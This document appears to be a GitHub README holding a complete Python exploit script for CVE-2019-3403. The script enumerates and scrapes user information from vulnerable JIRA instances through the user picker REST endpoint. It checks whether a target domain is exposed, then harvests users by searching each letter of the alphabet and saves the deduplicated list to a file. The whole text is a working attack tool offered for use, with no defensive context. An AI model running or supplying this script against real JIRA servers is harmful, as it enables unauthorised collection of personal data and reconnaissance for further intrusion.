README.md
Rendering markdown...
import requests
from bs4 import BeautifulSoup
import json
import argparse
from functools import reduce
def scrape_jira(target, query, verbose):
cleaned_info = []
r = requests.get(target, query)
users = r.json().get('users')
for user in users:
soup = BeautifulSoup(user.get('html'), 'html.parser')
cleaned_info.append(soup.get_text())
if verbose:
print(f'[*] Retrieved {len(users)} users for query: {query}')
return cleaned_info
def unique(input_list):
unique_list = []
for x in input_list:
if x not in unique_list:
unique_list.append(x)
return unique_list
parser = argparse.ArgumentParser(description='Scrape User Information from Vulnerable JIRA Instances [CVE-2019-3403]')
parser.add_argument('-d', '--domain', help='The domain of the target', required=True, type=str)
parser.add_argument('-q', '--query', help='Specific query to run against the API', default='', type=str)
parser.add_argument('-o', '--out', help='Output to a file', default='', type=str)
parser.add_argument('-v', '--verbose', help='Verbose output', action="store_true")
args = parser.parse_args()
target = f'https://{args.domain}/rest/api/2/user/picker'
query = {'query': args.query, 'maxResults': 1000}
# Test to see if the target is vulnerable
print(f'[*] Testing if {args.domain} is vulnerable')
resp = requests.get(target, params=query)
if resp.status_code != 200:
print(f'[-] {args.domain} is not vulnerable.')
exit(0)
else:
print(f'[+] {args.domain} is vulnerable!')
# If there is a user defined query
if args.query != '':
print(f'[*] Requesting user-supplied query: {args.query}')
cleaned = scrape_jira(target, query, args.verbose)
# Otherwise scrape everything
else:
print(f'[*] No user-supplied query... scraping everything')
# This scraping method is really stupid and I hate it...
# but it works. You just search once for each letter of the alphabet
scrape_set = [chr(i) for i in range(65,91)]
cleaned = []
for search in scrape_set:
query = {'query': search, 'maxResults': 1000}
cleaned.append(scrape_jira(target, query, args.verbose))
# We have a list of lists, so lets compress that
cleaned = reduce(list.__add__, cleaned)
final = unique(cleaned)
print(f'[*] Scraped {len(final)} users from JIRA.')
# Output
if args.out != '':
with open(args.out, 'w') as f:
for user in final:
f.write(f'{user}\n')
for user in final:
print(f'[+] User: {user}')